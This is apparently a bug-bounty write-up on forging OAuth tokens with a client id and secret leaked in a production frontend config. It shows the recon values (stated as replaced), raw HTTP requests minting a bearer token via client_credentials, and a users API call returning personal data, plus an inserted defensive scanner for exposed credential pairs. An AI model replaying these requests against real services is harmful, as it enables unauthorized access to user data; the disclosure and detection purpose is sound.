Forging OAuth tokens using discovered client id and client secret

Recon:

{
"ENV": "prod",
"SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
"SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
"MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
"MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
"SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};
Disclaimer: all values have been replaced.
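A defender-side check for exactly this class of finding, added here as an example and not part of the original write-up: it scans a shipped frontend config or bundle for `*_CLIENT_ID` / `*_CLIENT_SECRET` pairs and rates a complete pair as critical, since that is all the client_credentials grant needs. The sample input is the (already-replaced) config from the recon section; the key-naming pattern and severity scale are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample input: the leaked frontend config quoted in the write-up
# (its values were already replaced by the author, so nothing here is real).
SAMPLE_CONFIG = '''{
"ENV": "prod",
"SERVICE_CLIENT_ID": "mvaxns1234gahnbnjkdfsasdgyjkuigv",
"SERVICE_CLIENT_SECRET": "2a548s56-as84-d8fg-asd5-ahsndksj12sh",
"MARKETO_CLIENT_ID": "safsfads-ascd-vcxd-dsfds-adhdnmajkss",
"MARKETO_CLIENT_SECRET": "nchsjskalionmalkjhyusimnbg12sgdf",
"SERVICE_OAUTH_CLIENT_API_VERSION": "v2"
};'''

# "<PREFIX>_CLIENT_ID": "..." or "<PREFIX>_CLIENT_SECRET": "..."; the prefix is optional.
# A key such as SERVICE_OAUTH_CLIENT_API_VERSION does not match, because "CLIENT_"
# must be followed by ID or SECRET and then the closing quote.
CRED_RE = re.compile(r'"(?:([A-Z0-9_]+)_)?CLIENT_(ID|SECRET)"\s*:\s*"([^"]*)"')


def mask(value):
    """Show only the edges of a value so the report itself does not leak the secret."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "***"


def find_exposed_credentials(text):
    """Return one finding per OAuth client whose id and/or secret appears in `text`.

    Severity (assumed scale): critical when both halves of the client credential
    are present (anyone can run the client_credentials grant), high for a lone
    secret, low for a lone client id (public by design, but worth noting).
    """
    found = defaultdict(dict)
    for m in CRED_RE.finditer(text):
        prefix, kind, value = m.group(1) or "", m.group(2), m.group(3)
        found[prefix][kind] = value
    findings = []
    for prefix, creds in found.items():
        has_id, has_secret = "ID" in creds, "SECRET" in creds
        severity = "critical" if has_id and has_secret else "high" if has_secret else "low"
        findings.append({"client": prefix or "(unprefixed)", "has_id": has_id,
                         "has_secret": has_secret, "severity": severity,
                         "masked": {k: mask(v) for k, v in creds.items()}})
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_CONFIG):
        print(f"[{f['severity'].upper()}] {f['client']}: {f['masked']}")
```

Run it over every JS bundle and config the CDN serves; any critical finding means the secret must be rotated and moved server-side, not merely deleted from the file.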

What is OAuth?

Client Credentials Flow:

  1. Your app authenticates with the Auth0 Authorization Server using its Client ID and Client Secret (/oauth/token endpoint).
  2. Your Auth0 Authorization Server validates the Client ID and Client Secret.

If both are valid, the authorization server returns an access token, which the app then presents as a Bearer token to the API. Nothing else is checked, so anyone who holds the client id and client secret can mint valid tokens; the secret must never be shipped in client-side code.

Exploit:

POST /{identity url}/oauth/v1/token HTTP/1.1
Host: site.com
Authorization: Basic ehajnnsmnshjaknsjilkmnshtghjklikjWlOTno6VXdsQSgdhjnsmkjdhfbnnmkjshbnbhahsjkkluyhsghbshjnmkdjhead==
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

grant_type=client_credentials

HTTP/1.1 200 OK
Date: Thu, 05 May 2022 21:15:28 GMT
Content-Type: application/json
Content-Length: 1008
Connection: close
Cache-Control: no-cache, no-store, no-transform

{"token_type":"bearer","access_token":"eyJ0[…redacted…]"}

POST /api/v1/users HTTP/1.1
Host: site.com
Authorization: Bearer eyJ0[…redacted…]
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 200 OK
[...]
{
"username":"Name",
"id":"BLALALALA",
"phone":"21254488"
}

Basyouni

Cyber Security Engineer & Penetration Tester | Bug Bounty Hunter